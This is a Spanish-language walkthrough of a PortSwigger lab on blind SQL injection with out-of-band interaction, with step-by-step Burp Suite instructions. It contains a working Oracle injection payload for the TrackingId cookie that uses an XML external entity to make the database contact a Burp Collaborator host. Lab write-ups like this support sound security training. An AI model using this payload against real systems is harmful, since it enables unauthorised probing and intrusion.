PortSwigger - Blind SQL injection with out-of-band interaction

Solución


Nota:

Este reto solo se puede resolver con Burpsuite Professional

Vamos a la página principal.

Primero configura la extensión FoxyProxy para que funcione con Burpsuite, después ve a Burpsuite y haz click en el botón Intercept is off para que quede en azul.

Volvemos al navegador y recargamos la página.

Vemos la petición, hacemos click derecho y marcamos la opción Send to Repeater.

Luego vamos a la pestaña Repeteater.

Acá podemos modificar la petición con más comodidad.

Necesitaremos el Burp Collaborator para realizar este ataque, así que vamos al botón de la esquina que dice Burp y seleccionamos Burp Collaborator client. Si no te sale esta opción es porque no tienes el Burpsuite Professional.

Deberías tener una pestaña parecida a esta.

Haces click en el botón Copy to clipboard.

Volvemos a la pestaña Repeater y en el valor de la cookie TrackingId agregamos esta query:

'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//acá_pegas_el_valor_que_copiaste_anteriormente/">+%25remote%3b]>'),'/l')+FROM+dual--

Haces click en el botón Send.

Obtenemos una respuesta con el código 200 OK.

Volvemos a la pestaña de Burp Collaborator y hacemos click en Poll now.

Y veremos el resultado.

Volvemos a la página principal del laboratorio y resolvemos el reto.

Powered by Soopr   •  Theme  Moonwalk